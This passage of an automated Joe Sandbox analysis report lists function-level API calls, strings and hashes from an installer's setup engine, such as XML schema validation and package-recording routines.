                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8E62B
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                                                                                                                                    • String ID: ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$File$IsPresent$ParameterInfo.xml$schema validation failure: wrong number of File child nodes!
                                                                                                                                                                    • API String ID: 3417717588-3917201069
                                                                                                                                                                    • Opcode ID: 04784a472cbae02881a0c6fad9237459fcd792a592a61a5ef357685ba3a7faab
                                                                                                                                                                    • Instruction ID: 16745bc8ae96a2c606dd5b6c3e1cfeb809a4da4bd0b0b4d2c3f74411421d5700
                                                                                                                                                                    • Opcode Fuzzy Hash: 04784a472cbae02881a0c6fad9237459fcd792a592a61a5ef357685ba3a7faab
                                                                                                                                                                    • Instruction Fuzzy Hash: B2E13D74A00249EFDB04DFA8C944AEDBBB9BF19318F148169E425EB791C734EA05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D91287 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 342COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D9128E
                                                                                                                                                                      • Part of subcall function 69D78D44: __EH_prolog3.LIBCMT ref: 69D78D4B
                                                                                                                                                                      • Part of subcall function 69D8784C: __EH_prolog3.LIBCMT ref: 69D87853
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: !$ActionTable$ApplicableIf$CustomErrorHandling$IsPresent$MSIRepairOptions$MSIUninstallOptions$Name$RelatedProducts
                                                                                                                                                                    • API String ID: 431132790-4204973247
                                                                                                                                                                    • Opcode ID: ffe7e0a55ab6a8e415fbf759b6ea130583980fe340ef70224200a850a65d5e63
                                                                                                                                                                    • Instruction ID: 2fb1afc1c469127900c64a5c31c8f5facbe5470047c27c00044bcc1990313427
                                                                                                                                                                    • Opcode Fuzzy Hash: ffe7e0a55ab6a8e415fbf759b6ea130583980fe340ef70224200a850a65d5e63
                                                                                                                                                                    • Instruction Fuzzy Hash: C0D11D75A00249EFDB00DFA8C984AAEBBB9BF09314F148569F815EB791C734DA05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D94AD9 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 314COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D94AE0
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D789B7: __EH_prolog3.LIBCMT ref: 69D789BE
                                                                                                                                                                      • Part of subcall function 69D789B7: __CxxThrowException@8.LIBCMT ref: 69D78A89
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D94E3F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: Blockers$Configuration$EnterMaintenanceModeIf$Items$ParameterInfo.xml$Setup$SystemCheck$schema validation failure: wrong number of child elements under top level Setup element
                                                                                                                                                                    • API String ID: 2489616738-3586895666
                                                                                                                                                                    • Opcode ID: 34a3261b9069259dbdaf126a201cfd169d425937a4cd3bd2b469db12d7320431
                                                                                                                                                                    • Instruction ID: 101db17cbe49497eb1c07968603a2233a57127fba59ad49e3c21286058ff4887
                                                                                                                                                                    • Opcode Fuzzy Hash: 34a3261b9069259dbdaf126a201cfd169d425937a4cd3bd2b469db12d7320431
                                                                                                                                                                    • Instruction Fuzzy Hash: C9C119B5900249EFDF04DFA8C944AAEBBB9BF09318F148169F525EB681C734DA05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D86440 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 236COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D86447
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A1FF: __EH_prolog3_catch.LIBCMT ref: 69D7A206
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D86666
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D78415: __EH_prolog3.LIBCMT ref: 69D7841C
                                                                                                                                                                    Strings
                                                                                                                                                                    • schema validation failure: If URL is present then there must be a DownloadSize, xrefs: 69D865DA
                                                                                                                                                                    • URL, xrefs: 69D86453
                                                                                                                                                                    • schema validation failure: If HashValue is present then it must be a 64 hex-digit string, xrefs: 69D8667A
                                                                                                                                                                    • CompressedDownloadSize, xrefs: 69D86571
                                                                                                                                                                    • DownloadSize, xrefs: 69D864E3
                                                                                                                                                                    • CompressedHashValue, xrefs: 69D8652C
                                                                                                                                                                    • HashValue, xrefs: 69D8649E
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D865E8, 69D86688
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                                                                                                                                    • String ID: CompressedDownloadSize$CompressedHashValue$DownloadSize$HashValue$ParameterInfo.xml$URL$schema validation failure: If HashValue is present then it must be a 64 hex-digit string$schema validation failure: If URL is present then there must be a DownloadSize
                                                                                                                                                                    • API String ID: 24280941-3047338099
                                                                                                                                                                    • Opcode ID: a5b18c00a612693fba5750bc55b5256bfc01dfe83837e54c69f77066c369f36a
                                                                                                                                                                    • Instruction ID: 3c815a3723d320f4f2ef8a6251ea9bcf7b0694708bd3a789b1fe7683877e86ed
                                                                                                                                                                    • Opcode Fuzzy Hash: a5b18c00a612693fba5750bc55b5256bfc01dfe83837e54c69f77066c369f36a
                                                                                                                                                                    • Instruction Fuzzy Hash: 9BA16FB5900249EFCB10DFE8CA44AEEBBB9BF05318F548569E415EB691C734EA04CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB6782 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 235comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB6789
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DB988C: __EH_prolog3.LIBCMT ref: 69DB9893
                                                                                                                                                                      • Part of subcall function 69DB988C: GetCommandLineW.KERNEL32(0000002C,69DBD52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DB98B4
                                                                                                                                                                      • Part of subcall function 69DB988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69DB996E
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                      • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                      • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69DB67DD
                                                                                                                                                                    • CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,69DAFA6E,?,?,?,UiInfo.xml,?,00000000,00000044,69DB36D8,02602230,?,00000000), ref: 69DB67FB
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DB6A24
                                                                                                                                                                    • CoUninitialize.OLE32(?,69DEBE00,?,?,?,UiInfo.xml,?,00000000,00000044,69DB36D8,02602230,?,00000000,?), ref: 69DB6A3A
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69DB6A43
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8PathRelativeThrow$CommandCreateFileFreeInitializeInstanceLineModuleNameStringUninitialize
                                                                                                                                                                    • String ID: LCIDHints$ParameterInfo.xml$UiInfo.xml$Xml Document load failure
                                                                                                                                                                    • API String ID: 2432735026-2443555527
                                                                                                                                                                    • Opcode ID: 5172416992ced2349982766b7358d22edb478568ff7c833eb9a5e7c48b9e1e4e
                                                                                                                                                                    • Instruction ID: 7aba92da114098a83ecd9dfe1e7a6fce230a5d91bc8f4858821df8df18ce5056
                                                                                                                                                                    • Opcode Fuzzy Hash: 5172416992ced2349982766b7358d22edb478568ff7c833eb9a5e7c48b9e1e4e
                                                                                                                                                                    • Instruction Fuzzy Hash: AF918EB5900248EFCF01DFE8C984AEDBBB9AF49318F648169E015EB690C7359E05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D79F34 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D79F3B
                                                                                                                                                                    • VariantInit.OLEAUT32(00000003), ref: 69D79F49
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D79F83
                                                                                                                                                                      • Part of subcall function 69DB964C: __get_errno.LIBCMT ref: 69DB966C
                                                                                                                                                                      • Part of subcall function 69DB964C: __wcstoui64.LIBCMT ref: 69DB968F
                                                                                                                                                                      • Part of subcall function 69DB964C: __get_errno.LIBCMT ref: 69DB96A1
                                                                                                                                                                    • __ui64tow_s.LIBCMT ref: 69D79FEF
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7A0BC
                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 69D7A0C2
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 69D7A0E9
                                                                                                                                                                    Strings
                                                                                                                                                                    • schema validation failure: %s is invalid, a non-negitive numeric value is required for %s, xrefs: 69D7A03C
                                                                                                                                                                    • schema validation failure: attribute %s missing for %s %s, xrefs: 69D7A17B
                                                                                                                                                                    • Name, xrefs: 69D7A121
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant__get_errno$AllocClearException@8FreeH_prolog3InitThrow__ui64tow_s__wcstoui64
                                                                                                                                                                    • String ID: Name$schema validation failure: %s is invalid, a non-negitive numeric value is required for %s$schema validation failure: attribute %s missing for %s %s
                                                                                                                                                                    • API String ID: 1723289333-1070666262
                                                                                                                                                                    • Opcode ID: 448e36fd7b942367578d6cb23607bc5846e4fa0f46ea80ab0518c86113a39e2e
                                                                                                                                                                    • Instruction ID: 9b6dbfc209be14973580cda6268929d5e6c660a02d2b893e10b00ceeeeadb791
                                                                                                                                                                    • Opcode Fuzzy Hash: 448e36fd7b942367578d6cb23607bc5846e4fa0f46ea80ab0518c86113a39e2e
                                                                                                                                                                    • Instruction Fuzzy Hash: D3915B75900249EFDF01DFE8C944AEEBBB9BF09318F148569E815EB691DB30DA04CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7A8CC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210filememoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7A8D3
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7AA28
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,69D6A794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 69D7AA49
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7AA97
                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 69D7AAAC
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7AB2C
                                                                                                                                                                    Strings
                                                                                                                                                                    • ReadXML failed to open XML file %s, with error %d, xrefs: 69D7AA07
                                                                                                                                                                    • Could not find mandatory data file %s. This is a bad package., xrefs: 69D7AAE5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$H_prolog3$AllocChangeCloseException@8FindModuleNameNotificationPathPointerReadRelativeStringThrow
                                                                                                                                                                    • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                                                                                                                                    • API String ID: 956789720-4172873023
                                                                                                                                                                    • Opcode ID: 9a878aa10b760c3d57f3fde2d4f17f4544b7c0047cc3d7a8a8b7c6a70f198bc7
                                                                                                                                                                    • Instruction ID: ac464039b7fa47f649f7937bf30df092be4946d45a9ddf3547634b3fb7c0d155
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a878aa10b760c3d57f3fde2d4f17f4544b7c0047cc3d7a8a8b7c6a70f198bc7
                                                                                                                                                                    • Instruction Fuzzy Hash: B8814B75900249EFDF10DFA4C984EAEBBB9FF49314F108529E511BB690C7349A15CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E31A0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E31A7
                                                                                                                                                                      • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • _wcschr.LIBCMT ref: 698E31E8
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698E32A2
                                                                                                                                                                      • Part of subcall function 698FDBDB: RaiseException.KERNEL32(?,?,698F9236,?,?,?,?,?,698F9236,?,69907F54,699122B4), ref: 698FDC1D
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,698F6F33,?,?,00000000,00000044,698F668B,?,00000000,00000000,?,?,succeeded), ref: 698E32B9
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E32C6
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,00000000,?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 698E3307
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,698F2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,698EE271,00000000), ref: 698E330A
                                                                                                                                                                      • Part of subcall function 698DCA39: __EH_prolog3.LIBCMT ref: 698DCA40
                                                                                                                                                                      • Part of subcall function 698DCAC2: __EH_prolog3.LIBCMT ref: 698DCAC9
                                                                                                                                                                      • Part of subcall function 698DD170: __EH_prolog3.LIBCMT ref: 698DD177
                                                                                                                                                                    Strings
                                                                                                                                                                    • UIInfo.xml, xrefs: 698E3234
                                                                                                                                                                    • UiInfo.xml has INVALID ResourceDLLName %s, xrefs: 698E3222
                                                                                                                                                                    • Successfuly found file %s , xrefs: 698E3341
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Path$ExistsFile$ExceptionException@8RaiseRelativeThrow_wcschr
                                                                                                                                                                    • String ID: Successfuly found file %s $UIInfo.xml$UiInfo.xml has INVALID ResourceDLLName %s
                                                                                                                                                                    • API String ID: 1926448744-2896109536
                                                                                                                                                                    • Opcode ID: 3ecaa95dac6810ca4c487b0c8875a43fca82b37812876cd6df2903b07db7e85b
                                                                                                                                                                    • Instruction ID: 2b2fb5d9c45e1bdde7b3c46bab4bd33a9d9968a9a327484b260d573bc2434e73
                                                                                                                                                                    • Opcode Fuzzy Hash: 3ecaa95dac6810ca4c487b0c8875a43fca82b37812876cd6df2903b07db7e85b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4571907580014DEFCF00DBE8C984AEEBBB8BF16318F549959E451A7291DB31DA09CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAA78F Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 160COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DAA796
                                                                                                                                                                      • Part of subcall function 69D7C5D4: __EH_prolog3.LIBCMT ref: 69D7C5DB
                                                                                                                                                                      • Part of subcall function 69D7C5D4: GetLastError.KERNEL32 ref: 69D7C609
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DB1236: __EH_prolog3.LIBCMT ref: 69DB123D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA83B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA8F4
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA95B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to record PackageVersion, xrefs: 69DAA7F7
                                                                                                                                                                    • Failed to record PackageName, xrefs: 69DAA7B8
                                                                                                                                                                    • Failed to record DisplayedLcidId, xrefs: 69DAA855
                                                                                                                                                                    • Failed to record InstallerVersion, xrefs: 69DAA8B0
                                                                                                                                                                    • Failed to record IsRetailBuild, xrefs: 69DAA975
                                                                                                                                                                    • Failed to record PatchType, xrefs: 69DAA90E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorH_prolog3Last
                                                                                                                                                                    • String ID: Failed to record DisplayedLcidId$Failed to record InstallerVersion$Failed to record IsRetailBuild$Failed to record PackageName$Failed to record PackageVersion$Failed to record PatchType
                                                                                                                                                                    • API String ID: 685212868-335235891
                                                                                                                                                                    • Opcode ID: 13bc51c731fd0e5642911a329c042381562ccb632e055f171ab7eb9684d28af9
                                                                                                                                                                    • Instruction ID: 150d80cee20230f422c86921e308078bb3cc5c3f4ae1404c4dacc46ba7fcd880
                                                                                                                                                                    • Opcode Fuzzy Hash: 13bc51c731fd0e5642911a329c042381562ccb632e055f171ab7eb9684d28af9
                                                                                                                                                                    • Instruction Fuzzy Hash: A8518C7A500248EFDB10DFA4CA45E8E3BAABF45368F508538B915DBA90C774DA11CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB0076 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 121COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB007D
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,02602230,02602230,02602230,02602230,00000050,69DA93A7,?,UserControlled,?,02602230,69D6A794,?,69D7BFC7,00000018,69D7BC3C), ref: 69DB010B
                                                                                                                                                                    • SqmIsWindowsOptedIn.SQMAPI(?,UserControlled,?,02602230,69D6A794,?,69D7BFC7,00000018,69D7BC3C,02602254,?,?,?,?,?,?), ref: 69DB0121
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DB01CB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
